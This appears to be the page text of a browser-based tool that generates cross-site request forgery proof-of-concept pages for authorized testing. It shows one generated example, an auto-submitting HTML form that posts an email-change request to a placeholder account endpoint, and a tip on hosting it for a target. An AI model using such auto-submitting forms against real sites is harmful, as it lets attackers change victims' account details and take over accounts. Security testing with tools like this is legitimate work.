csrf poc generator

Turn a state-changing request into a self-submitting HTML form to demonstrate cross-site request forgery. Built entirely in your browser. For systems you are authorized to test.

auto-submit

Parameters — one key=value per line

PoC HTML

<!doctype html>
<html>
  <body>
    <!-- CSRF proof-of-concept — authorized testing only -->
    <form action="https://target.example/account/email" method="POST" enctype="application/x-www-form-urlencoded">
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="confirm" value="[email protected]" />

    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

Tip: host this with the payload host and point your target at it, or catch the resulting request with a request bin.